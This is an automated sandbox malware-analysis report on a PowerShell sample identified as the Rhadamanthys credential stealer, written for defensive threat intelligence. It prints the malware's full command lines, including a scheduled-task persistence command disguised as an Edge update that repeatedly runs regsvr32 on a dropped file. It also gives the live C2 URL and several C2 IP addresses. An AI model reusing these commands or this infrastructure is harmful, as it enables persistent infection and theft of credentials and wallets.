Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.ps1

Overview

General Information

Sample name:test.ps1
Analysis ID:1529309
MD5:b629e4a76638f91a67059188d07e27f6
SHA1:42b37211578e971c684b493c8b604874518652e3
SHA256:b4dabf844bceeb5b1fa448549735296b4bdf289f346f960228d52a7a09e35ea1
Tags:ps1rocketdocs-loluser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dllhost Internet Connection
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ajbs50ul.bat (PID: 6472 cmdline: "C:\Users\Public\ajbs50ul.bat" MD5: 8837DF25AABC4FAD85E851ACA192F714)
      • powershell.exe (PID: 7088 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • regsvr32.exe (PID: 6844 cmdline: "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • utox_x86_x64.exe (PID: 4308 cmdline: "C:\Users\user\Desktop\utox_x86_x64.exe" MD5: E9679980AA73CFC7CF00F3DA7949C661)
  • regsvr32.exe (PID: 1316 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • OpenWith.exe (PID: 6960 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)
      • wmpnscfg.exe (PID: 7012 cmdline: "C:\Program Files\Windows Media Player\wmpnscfg.exe" MD5: F912FF78DE347834EA56CEB0E12F80EC)
        • dllhost.exe (PID: 5664 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • rekeywiz.exe (PID: 1836 cmdline: "C:\Windows\system32\rekeywiz.exe" MD5: A24EFFD38DDC2FFAB4F0592CA2CC585E)
      • rekeywiz.exe (PID: 6076 cmdline: "C:\Windows\system32\rekeywiz.exe" MD5: A24EFFD38DDC2FFAB4F0592CA2CC585E)
        • powershell.exe (PID: 2860 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{848CC004-CC00-4888-C000-44488CCC0488}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • regsvr32.exe (PID: 1224 cmdline: "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • regsvr32.exe (PID: 3744 cmdline: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/oSyU.ini MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 71 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.3.regsvr32.exe.1c9a0000.5.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              11.3.OpenWith.exe.1bd877d5168.87.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                11.3.OpenWith.exe.1bd87b10000.5.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  11.3.OpenWith.exe.1bd87830000.4.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    7.3.regsvr32.exe.1c6c0000.4.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 4 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_5884.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Execution from Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\ajbs50ul.bat" , CommandLine: "C:\Users\Public\ajbs50ul.bat" , CommandLine|base64offset|contains: , Image: C:\Users\Public\ajbs50ul.bat, NewProcessName: C:\Users\Public\ajbs50ul.bat, OriginalFileName: C:\Users\Public\ajbs50ul.bat, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\ajbs50ul.bat" , ProcessId: 6472, ProcessName: ajbs50ul.bat
                        Sigma detected: Outbound RDP Connections Over Non-Standard Tools
                        Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 104.223.122.15, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\utox_x86_x64.exe, Initiated: true, ProcessId: 4308, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 52252
                        Sigma detected: Parent in Public Folder Suspicious Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\ajbs50ul.bat" , ParentImage: C:\Users\Public\ajbs50ul.bat, ParentProcessId: 6472, ParentProcessName: ajbs50ul.bat, ProcessCommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", ProcessId: 7088, ProcessName: powershell.exe
                        Sigma detected: Potentially Suspicious Malware Callback Communication
                        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 185.196.9.174, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 3744, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 52249
                        Sigma detected: Powerup Write Hijack DLL
                        Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5884, TargetFilename: C:\Users\Public\ajbs50ul.bat
                        Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5884, TargetFilename: C:\Users\Public\ajbs50ul.bat
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", ProcessId: 5884, ProcessName: powershell.exe
                        Sigma detected: Dllhost Internet Connection
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 46.29.238.96, DestinationIsIpv6: false, DestinationPort: 4872, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 5664, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 52242
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\ajbs50ul.bat" , CommandLine: "C:\Users\Public\ajbs50ul.bat" , CommandLine|base64offset|contains: , Image: C:\Users\Public\ajbs50ul.bat, NewProcessName: C:\Users\Public\ajbs50ul.bat, OriginalFileName: C:\Users\Public\ajbs50ul.bat, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\ajbs50ul.bat" , ProcessId: 6472, ProcessName: ajbs50ul.bat
                        Sigma detected: Network Connection Initiated By Regsvr32.EXE
                        Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.196.9.174, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 3744, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 52249
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5884, TargetFilename: C:\Users\Public\ajbs50ul.bat
                        Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini, CommandLine: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini, ProcessId: 1316, ProcessName: regsvr32.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1", ProcessId: 5884, ProcessName: powershell.exe

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Sigma detected: Powershell launch regsvr32
                        Source: Process startedAuthor: Joe Security: Data: Command: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", CommandLine|base64offset|contains: -, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\ajbs50ul.bat" , ParentImage: C:\Users\Public\ajbs50ul.bat, ParentProcessId: 6472, ParentProcessName: ajbs50ul.bat, ProcessCommandLine: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/4smg.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C804C8C0-8CC0-4804-C048-00888CC0048C}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)", ProcessId: 7088, ProcessName: powershell.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T20:51:48.271866+020028548242Potentially Bad Traffic147.45.126.713752192.168.2.752140TCP
                        2024-10-08T20:51:58.223869+020028548242Potentially Bad Traffic147.45.126.713752192.168.2.752206TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T20:52:24.637017+020028424781Malware Command and Control Activity Detected185.196.9.1747777192.168.2.752249TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-08T20:51:38.369878+020028548021Domain Observed Used for C2 Detected147.45.126.713752192.168.2.749819TCP
                        2024-10-08T20:51:48.271866+020028548021Domain Observed Used for C2 Detected147.45.126.713752192.168.2.752140TCP
                        2024-10-08T20:51:58.223869+020028548021Domain Observed Used for C2 Detected147.45.126.713752192.168.2.752206TCP
                        2024-10-08T20:52:04.514007+020028548021Domain Observed Used for C2 Detected46.29.238.964872192.168.2.752242TCP
                        2024-10-08T20:53:24.866553+020028548021Domain Observed Used for C2 Detected46.29.238.964872192.168.2.756563TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: test.ps1Avira: detected
                        Found malware configuration
                        Source: 00000007.00000002.1527561302.0000000003121000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\Public\ajbs50ul.batReversingLabs: Detection: 63%
                        Source: C:\Users\user\AppData\Roaming\oSyU.iniReversingLabs: Detection: 45%
                        Multi AV Scanner detection for submitted file
                        Source: test.ps1ReversingLabs: Detection: 23%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49705 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49776 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.7:52142 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:52152 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52166 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52174 version: TLS 1.2
                        Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880BF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000007.00000003.1499112510.000000001C8B0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1497909811.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000007.00000003.1500277385.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500391126.000000001C780000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1510388367.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880F7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: winload_prod.pdbsAlarms^ source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ntkrnlmp.pdbPX6 source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880C7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: OpenWith.exe, 0000000B.00000003.1615770138.000001BD880EF000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9440F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,3_2_00007FF79E9440F0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4x nop then ret 7_2_1C0C10BC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 4x nop then dec esp14_2_00000203FE6C5641
                        Source: C:\Windows\System32\rekeywiz.exeCode function: 4x nop then dec esp16_2_00000260AF595641

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:49819
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:52140
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.7:52206
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.7:52242
                        Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.196.9.174:7777 -> 192.168.2.7:52249
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.7:56563
                        System process connects to network (likely due to code injection or exploit)
